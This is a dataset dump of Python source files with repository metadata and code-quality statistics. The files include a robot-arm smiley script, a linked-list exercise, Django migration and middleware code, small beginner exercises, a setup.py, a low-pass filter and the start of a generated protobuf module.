hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b63fae52a7308e09b772e87e913912fdafe1537a | 1,546 | py | Python | tests/smiley.py | zoso95/xArm | 7598a0df976770179b7b5229cedd2ec46db92ef9 | [
"MIT"
] | null | null | null | tests/smiley.py | zoso95/xArm | 7598a0df976770179b7b5229cedd2ec46db92ef9 | [
"MIT"
] | null | null | null | tests/smiley.py | zoso95/xArm | 7598a0df976770179b7b5229cedd2ec46db92ef9 | [
"MIT"
] | null | null | null | from xarm.arm import *
import math
import time
grip_close()
def reset():
movej((500, 500, 500, 500, 500), 2000)
power_off()
#jDepart = (497, 426, 738, 55, 500)
jDepart = (497, 426, 700, 55, 500)
movej(jDepart, 2000)
eye_x = 10
z_up = 0
z_down = -18
#(495, 420, 700, 64, 502)
servo_coord = get_position(False)
#(135, -3, -21)
center_origin = get_position(True)
print(servo_coord)
print(center_origin)
# y(+), x(inv), up(+)
#movel(appro(pA, (30, 0, 0)), 1000)
movel(appro(center_origin, (50, eye_x, z_up)), 1000)
movel(appro(center_origin, (50, eye_x, z_down)), 100)
movel(appro(center_origin, (30, eye_x, z_down)), 3000)
movel(appro(center_origin, (30, eye_x, z_up)), 100)
movel(appro(center_origin, (50, -eye_x, z_up)), 1000)
movel(appro(center_origin, (50, -eye_x, z_down)), 100)
movel(appro(center_origin, (30, -eye_x, z_down)), 3000)
movel(appro(center_origin, (30, -eye_x, z_up)), 100)
cx, cy = 0, 30
r = 30
for theta in range(0, -180, -15):
angle = (theta/360)*2*math.pi
x,y = cx+r*math.cos(angle), cy+r*math.sin(angle)
movel(appro(center_origin, (y, x, z_down)), 1000)
reset()
"""
x_start = 40
movel(appro(center_origin, (50, -x_start, 5)), 1000)
movel(appro(center_origin, (50, -x_start, 0)), 100)
"""
"""
pA = get_position(True)
movel(appro(pA, (30, 0, 5)), 1000)
grip_close(850)
pAppr = appro(pA, (30, 0, 25))
movel(pAppr, 1000)
movel(appro(pA, (30, 0, 5)), 1000)
grip_open()
time.sleep(2)
movej((500, 500, 500, 500, 500), 2000)
power_off()
"""
#import code
#code.interact(local=locals())
| 18.404762 | 55 | 0.649418 | 272 | 1,546 | 3.522059 | 0.301471 | 0.146138 | 0.183716 | 0.25261 | 0.5 | 0.484342 | 0.480167 | 0.417537 | 0.367432 | 0.296451 | 0 | 0.160061 | 0.151358 | 1,546 | 83 | 56 | 18.626506 | 0.570122 | 0.107374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.096774 | 0 | 0.129032 | 0.064516 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
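The smile in tests/smiley.py is traced by sampling a circle parametrically with `cos`/`sin`. A standalone sketch of that sampling, independent of the xArm API (the function name `arc_points` is my own):

```python
import math

def arc_points(cx, cy, r, start_deg, stop_deg, step_deg):
    """Sample (x, y) points along a circular arc, like the smile loop above."""
    points = []
    for theta in range(start_deg, stop_deg, step_deg):
        angle = math.radians(theta)  # equivalent to (theta/360)*2*pi
        points.append((cx + r * math.cos(angle), cy + r * math.sin(angle)))
    return points
```

With the script's values, `arc_points(0, 30, 30, 0, -180, -15)` yields the 12 waypoints the arm visits, starting at (30, 30) and sweeping through the bottom of the circle.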
b64585c1a28a04264c03e9c032860767ded10d91 | 1,668 | py | Python | src/143-ReorderList.py | Jiezhi/myleetcode | b346e94c46da2a3033ebc8ff50e621aa179c4f62 | [
"MIT"
] | 1 | 2022-03-03T15:11:48.000Z | 2022-03-03T15:11:48.000Z | src/143-ReorderList.py | Jiezhi/myleetcode | b346e94c46da2a3033ebc8ff50e621aa179c4f62 | [
"MIT"
] | null | null | null | src/143-ReorderList.py | Jiezhi/myleetcode | b346e94c46da2a3033ebc8ff50e621aa179c4f62 | [
"MIT"
] | 2 | 2022-01-20T22:49:58.000Z | 2022-01-20T22:53:13.000Z | #!/usr/bin/env python
"""
CREATED AT: 2021/12/22
Des:
GITHUB: https://github.com/Jiezhi/myleetcode
Difficulty: Medium
Tag:
See:
Time Spent: 20 min
"""
from typing import Optional
from src.list_node import ListNode, buildListNode
class Solution:
def reorderList(self, head: Optional[ListNode]) -> None:
"""
Runtime: 96 ms, faster than 53.19%
Memory Usage: 23.2 MB, less than 94.94%
Do not return anything, modify head in-place instead.
The number of nodes in the list is in the range [1, 5 * 10^4].
1 <= Node.val <= 1000
"""
nums = []
node = head
while node:
nums.append(node.val)
node = node.next
node = head.next
index = 1
flag = 1
while index <= len(nums) / 2 and node:
flag *= -1
node.val = nums[index * flag]
node = node.next
if flag == 1:
index += 1
def test():
test_case = buildListNode([1])
Solution().reorderList(test_case)
assert test_case == buildListNode([1])
test_case = buildListNode([1, 2])
Solution().reorderList(test_case)
assert test_case == buildListNode([1, 2])
test_case = buildListNode([1, 2, 3])
Solution().reorderList(test_case)
assert test_case == buildListNode([1, 3, 2])
test_case = buildListNode([1, 2, 3, 4])
Solution().reorderList(test_case)
assert test_case == buildListNode([1, 4, 2, 3])
test_case = buildListNode([1, 2, 3, 4, 5])
Solution().reorderList(test_case)
assert test_case == buildListNode([1, 5, 2, 4, 3])
if __name__ == '__main__':
test()
| 23.492958 | 70 | 0.585132 | 220 | 1,668 | 4.327273 | 0.4 | 0.12605 | 0.220588 | 0.231092 | 0.392857 | 0.368697 | 0.368697 | 0.288866 | 0.288866 | 0 | 0 | 0.058032 | 0.28717 | 1,668 | 70 | 71 | 23.828571 | 0.742641 | 0.217626 | 0 | 0.194444 | 0 | 0 | 0.006441 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 1 | 0.055556 | false | 0 | 0.055556 | 0 | 0.138889 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
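The solution above reorders by copying node values into an auxiliary list. A common O(1)-extra-space alternative (not the author's code) finds the middle, reverses the second half, and interleaves the two halves; a sketch:

```python
class ListNode:
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def reorder_in_place(head):
    """Reorder L0->L1->...->Ln into L0->Ln->L1->L(n-1)->... in O(1) extra space."""
    if head is None or head.next is None:
        return
    # 1. Find the middle with slow/fast pointers.
    slow = fast = head
    while fast.next and fast.next.next:
        slow = slow.next
        fast = fast.next.next
    # 2. Detach and reverse the second half.
    prev, cur = None, slow.next
    slow.next = None
    while cur:
        cur.next, prev, cur = prev, cur, cur.next
    # 3. Interleave the first half with the reversed second half.
    first, second = head, prev
    while second:
        t1, t2 = first.next, second.next
        first.next = second
        second.next = t1
        first, second = t1, t2
```

This rewires pointers instead of values, which matters if nodes carry payloads beyond `val`.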
b6510e75092a2e29d25ef15017430fac746a4e41 | 364 | py | Python | src/django_plpy/migrations/0001_initial.py | swqqn/plpy | 696d522e49c848aa310dc9f71f6d8b07ca6730bb | [
"MIT"
] | 37 | 2022-01-15T11:12:13.000Z | 2022-03-31T01:40:46.000Z | src/django_plpy/migrations/0001_initial.py | swqqn/plpy | 696d522e49c848aa310dc9f71f6d8b07ca6730bb | [
"MIT"
] | 2 | 2022-03-11T14:01:18.000Z | 2022-03-27T08:13:20.000Z | src/django_plpy/migrations/0001_initial.py | swqqn/plpy | 696d522e49c848aa310dc9f71f6d8b07ca6730bb | [
"MIT"
] | 1 | 2022-03-04T16:13:35.000Z | 2022-03-04T16:13:35.000Z | # Generated by Django 3.2.2 on 2021-05-07 11:18
from django.contrib.postgres.operations import CreateExtension
from django.db import migrations
class PythonExtension(CreateExtension):
def __init__(self):
self.name = 'plpython3u'
class Migration(migrations.Migration):
dependencies = [
]
operations = [
PythonExtension()
]
| 19.157895 | 62 | 0.703297 | 40 | 364 | 6.3 | 0.7 | 0.079365 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.208791 | 364 | 18 | 63 | 20.222222 | 0.819444 | 0.123626 | 0 | 0 | 1 | 0 | 0.031546 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b6548f4cd5309fbed9cfc02f8f9f385c9bdb39fa | 466 | py | Python | exercises/Desafio032.py | zThiago15/Curso-em-Video | ef25e0497edb79bdfbe71fde485f4dafc0d2a0e6 | [
"MIT"
] | null | null | null | exercises/Desafio032.py | zThiago15/Curso-em-Video | ef25e0497edb79bdfbe71fde485f4dafc0d2a0e6 | [
"MIT"
] | null | null | null | exercises/Desafio032.py | zThiago15/Curso-em-Video | ef25e0497edb79bdfbe71fde485f4dafc0d2a0e6 | [
"MIT"
] | 1 | 2021-07-24T21:39:26.000Z | 2021-07-24T21:39:26.000Z | from datetime import date
ano = int(input('\033[30mQual ano você quer analisar? Coloque 0 para analisar o ano atual: '))
if ano == 0:
    ano = date.today().year  # Analyze the current year and report whether it is a leap year or not.
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print(f'\033[1;30mO ano \033[1;34m{ano} \033[30mÉ BISSEXTO.')
else:
print(f'\033[31mO ano \033[1;34m{ano} \033[31mNÃO é BISSEXTO.')
print('\033[34m='*15,'Fim do PROGRAMA','='*15) | 51.777778 | 94 | 0.654506 | 88 | 466 | 3.465909 | 0.534091 | 0.078689 | 0.078689 | 0.111475 | 0.104918 | 0.104918 | 0 | 0 | 0 | 0 | 0 | 0.15445 | 0.180258 | 466 | 9 | 95 | 51.777778 | 0.643979 | 0.133047 | 0 | 0 | 0 | 0.222222 | 0.502475 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
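The modular-arithmetic rule above (divisible by 4, except centuries not divisible by 400) can be cross-checked against the standard library; a minimal sketch (the function name `is_leap` is my own):

```python
import calendar

def is_leap(year):
    # Same rule as the script above.
    return year % 4 == 0 and year % 100 != 0 or year % 400 == 0

# calendar.isleap implements the Gregorian rule, so the two must agree.
for year in (1900, 2000, 2020, 2023, 2024):
    assert is_leap(year) == calendar.isleap(year)
```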
b654a4d176593e4826553450974b3f6ea99a5d7c | 581 | py | Python | capitulo-03/ex11.py | bryan-lima/exercicios-livro-introd-prog-python-3ed | b6bc26dced9728510865704a80cb0d97f81f756b | [
"MIT"
] | 3 | 2021-11-09T17:54:10.000Z | 2022-01-30T22:32:25.000Z | capitulo-03/ex11.py | bryan-lima/exercicios-livro-introd-prog-python-3ed | b6bc26dced9728510865704a80cb0d97f81f756b | [
"MIT"
] | null | null | null | capitulo-03/ex11.py | bryan-lima/exercicios-livro-introd-prog-python-3ed | b6bc26dced9728510865704a80cb0d97f81f756b | [
"MIT"
] | null | null | null | # Faça um programa que solicite o preço de uma mercadoria e o percentual de desconto
# Exiba o valor do desconto e o preço a pagar
currentPrice = float(input('\nInforme o preço do produto: R$ '))
discountPercentage = float(input('Digite o percentual de desconto: '))
discount = currentPrice * discountPercentage / 100
newPrice = currentPrice - discount
print(f'\nO valor atual do produto é de R$ {currentPrice:.2f}')
print(f'Um desconto de {discountPercentage}%, representa um desconto de R$ {discount:.2f}')
print(f'Com o desconto, o produto passa a custar R$ {newPrice:.2f}')
| 44.692308 | 91 | 0.748709 | 87 | 581 | 5 | 0.448276 | 0.041379 | 0.05977 | 0.096552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01217 | 0.151463 | 581 | 12 | 92 | 48.416667 | 0.870183 | 0.216867 | 0 | 0 | 0 | 0 | 0.570796 | 0.048673 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.142857 | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 2 |
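The discount arithmetic above can be packaged as a small reusable function; a sketch (the name `apply_discount` is my own):

```python
def apply_discount(price, pct):
    """Return (discount_amount, final_price) for a percentage discount."""
    discount = price * pct / 100
    return discount, price - discount
```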
b65c9d3369799dc5b04300093745ef74508db7dd | 574 | py | Python | djconfig/middleware.py | nicolasdet/projet_django | 85731e8594597dc3968910be2f37b950675ca809 | [
"PSF-2.0",
"BSD-3-Clause"
] | 23 | 2015-01-30T11:57:44.000Z | 2021-07-31T14:24:52.000Z | djconfig/middleware.py | nicolasdet/projet_django | 85731e8594597dc3968910be2f37b950675ca809 | [
"PSF-2.0",
"BSD-3-Clause"
] | 24 | 2015-04-19T12:47:50.000Z | 2020-09-12T19:16:18.000Z | djconfig/middleware.py | nicolasdet/projet_django | 85731e8594597dc3968910be2f37b950675ca809 | [
"PSF-2.0",
"BSD-3-Clause"
] | 3 | 2015-04-13T13:50:52.000Z | 2020-09-12T11:12:27.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import conf
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError: # Django < 1.10
MiddlewareMixin = object
__all__ = ['DjConfigMiddleware']
class DjConfigMiddleware(MiddlewareMixin):
"""
Populate the cache using the database.\
Reload the cache *only* if it is not up\
to date with the config model
"""
def process_request(self, request):
conf.reload_maybe()
# Backward compatibility
DjConfigLocMemMiddleware = DjConfigMiddleware
| 20.5 | 56 | 0.719512 | 63 | 574 | 6.380952 | 0.746032 | 0.039801 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008715 | 0.200348 | 574 | 27 | 57 | 21.259259 | 0.867102 | 0.303136 | 0 | 0 | 0 | 0 | 0.047619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b66e2c46936a67fcb0715e7e6a911a1206882745 | 1,083 | py | Python | setup.py | matthewoliver/psql2mysql | 3353d9eee474479b5b514d558fdbafaab18f6a3d | [
"Apache-2.0"
] | null | null | null | setup.py | matthewoliver/psql2mysql | 3353d9eee474479b5b514d558fdbafaab18f6a3d | [
"Apache-2.0"
] | null | null | null | setup.py | matthewoliver/psql2mysql | 3353d9eee474479b5b514d558fdbafaab18f6a3d | [
"Apache-2.0"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='psql2mysql',
version='0.4.0',
description='Copy data from PostgreSQL databases to MySQL',
url='https://github.com/SUSE/psql2mysql',
author='SUSE LLC',
author_email='things@suse.com',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
packages=find_packages(exclude=['tests']),
install_requires=[
'oslo.config',
'oslo.log',
'psycopg2',
'prettytable',
'PyMySQL',
'rfc3986',
'SQLAlchemy<1.1.0,>=1.0.10',
],
tests_require=[
'flake8',
'mock',
],
entry_points={
'console_scripts': [
'psql2mysql=psql2mysql:main',
],
},
)
| 27.075 | 63 | 0.55494 | 106 | 1,083 | 5.603774 | 0.641509 | 0.159933 | 0.210438 | 0.131313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040365 | 0.290859 | 1,083 | 39 | 64 | 27.769231 | 0.733073 | 0 | 0 | 0.105263 | 0 | 0 | 0.495845 | 0.047091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.026316 | 0 | 0.026316 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b68a9da01734c4c91ad691365393e1ed523c74a8 | 1,018 | py | Python | source_code/NLP_words_and_sentences.py | diogenisAl/pyNLP | 14fc5b13b6755397e628c5f2f8de9d9ee6adbffe | [
"MIT"
] | null | null | null | source_code/NLP_words_and_sentences.py | diogenisAl/pyNLP | 14fc5b13b6755397e628c5f2f8de9d9ee6adbffe | [
"MIT"
] | null | null | null | source_code/NLP_words_and_sentences.py | diogenisAl/pyNLP | 14fc5b13b6755397e628c5f2f8de9d9ee6adbffe | [
"MIT"
] | null | null | null | # Import the TextBlob class from the textblob library
from textblob import TextBlob
# Set a text to analyze
text = "Today is a beautiful day. Tomorrow looks like bad weather. is a"
# Create a blob object using the TextBlob class, with the text variable as a parameter
blob = TextBlob(text)
# We can see the sentences in the text by printing blob.sentences
# blob.sentences is a list, and every element is one sentence of the text
print("Sentences in the text:")
print(blob.sentences)
# We can see the words in the text by printing blob.words
# blob.words is a list, and every element is one word of the text
print("\nWords in the text:")
print(blob.words)
# TODO:
# 1. Print all the UNIQUE words in the text
all_items = blob.words
unique_items = []
for x in all_items:
if x not in unique_items:
unique_items.append(x)
print("\nUnique words in the text:")
print(unique_items)
# 2. Print the number of unique words in the text
print("\nThe number of unique words in the text:")
print(len(unique_items)) | 31.8125 | 86 | 0.746562 | 179 | 1,018 | 4.206704 | 0.340782 | 0.102258 | 0.095618 | 0.092961 | 0.320053 | 0.220452 | 0.159363 | 0.159363 | 0 | 0 | 0 | 0.002401 | 0.181729 | 1,018 | 32 | 87 | 31.8125 | 0.901561 | 0.500982 | 0 | 0 | 0 | 0 | 0.34739 | 0 | 0 | 0 | 0 | 0.03125 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
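The unique-word loop above does a linear membership test per word, so it is O(n²) in the worst case. A standard-library sketch that keeps first-seen order without TextBlob (variable names are my own; the split/strip step only approximates TextBlob's tokenization):

```python
import string

text = "Today is a beautiful day. Tomorrow looks like bad weather. is a"
# Lowercase, split on whitespace, and strip surrounding punctuation.
words = [w.strip(string.punctuation) for w in text.lower().split()]
# dict.fromkeys de-duplicates while preserving first-seen order.
unique_words = list(dict.fromkeys(words))
print(unique_words)
print(len(unique_words))
```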
b68ae00e50396bec4da5de82f4e22865fe83b0ae | 871 | py | Python | src/navi/components/other/low_pass_filter.py | project-capo/app-drive-and-visualize | 05305c3bdc23769e259cdb82b3a4fac5bb177d39 | [
"Unlicense"
] | null | null | null | src/navi/components/other/low_pass_filter.py | project-capo/app-drive-and-visualize | 05305c3bdc23769e259cdb82b3a4fac5bb177d39 | [
"Unlicense"
] | null | null | null | src/navi/components/other/low_pass_filter.py | project-capo/app-drive-and-visualize | 05305c3bdc23769e259cdb82b3a4fac5bb177d39 | [
"Unlicense"
] | null | null | null | from navi.components.component import Component
__author__ = 'paoolo'
class LowPassFilter(Component):
"""
Used to low pass.
"""
def __init__(self):
super(LowPassFilter, self).__init__(enable=True)
self._old_left = 0.0
self._old_right = 0.0
self._alpha = 0.3
def modify(self, left, right):
left = self._low_pass_filter(left, self._old_left)
right = self._low_pass_filter(right, self._old_right)
self._old_left, self._old_right = left, right
return left, right
def _low_pass_filter(self, new_value, old_value):
if old_value is None:
return new_value
return old_value + self._alpha * (new_value - old_value)
@property
def alpha(self):
return self._alpha
@alpha.setter
def alpha(self, val):
self._alpha = float(val) | 22.921053 | 64 | 0.631458 | 115 | 871 | 4.4 | 0.321739 | 0.083004 | 0.065217 | 0.067194 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009464 | 0.272101 | 871 | 38 | 65 | 22.921053 | 0.788644 | 0.019518 | 0 | 0 | 0 | 0 | 0.007151 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0.217391 | 0.043478 | 0.043478 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
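The class above applies a first-order exponential smoother to each wheel value. A standalone sketch of the same recurrence, y[n] = y[n-1] + alpha * (x[n] - y[n-1]), shown as a step response (the free-function form is my own):

```python
def low_pass(new_value, old_value, alpha=0.3):
    """First-order IIR smoother; passes the input through on the first sample."""
    if old_value is None:
        return new_value
    return old_value + alpha * (new_value - old_value)

# Step response: feed a constant 1.0 into a filter that starts at 0.0.
y = 0.0
trace = []
for _ in range(5):
    y = low_pass(1.0, y, alpha=0.5)
    trace.append(y)
```

The output converges geometrically toward the input; a larger alpha tracks faster but smooths less.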
b6b72d4482f07a1269f3296d2e1827d78e450620 | 19,711 | py | Python | arista/tag/v1/tag_pb2.py | barryCrunch/cloudvision-python | bafb55a57743141ef419ce8b6f3adda31a18ca42 | [
"Apache-2.0"
] | 8 | 2020-10-22T13:19:00.000Z | 2021-12-16T02:16:47.000Z | arista/tag/v1/tag_pb2.py | barryCrunch/cloudvision-python | bafb55a57743141ef419ce8b6f3adda31a18ca42 | [
"Apache-2.0"
] | 6 | 2020-12-16T11:31:03.000Z | 2021-11-19T10:00:37.000Z | arista/tag/v1/tag_pb2.py | barryCrunch/cloudvision-python | bafb55a57743141ef419ce8b6f3adda31a18ca42 | [
"Apache-2.0"
] | 7 | 2020-12-04T01:30:34.000Z | 2021-11-11T21:40:12.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: arista/tag.v1/tag.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from fmp import extensions_pb2 as fmp_dot_extensions__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='arista/tag.v1/tag.proto',
package='arista.tag.v1',
syntax='proto3',
serialized_options=_b('Z\"arista/resources/arista/tag.v1;tag'),
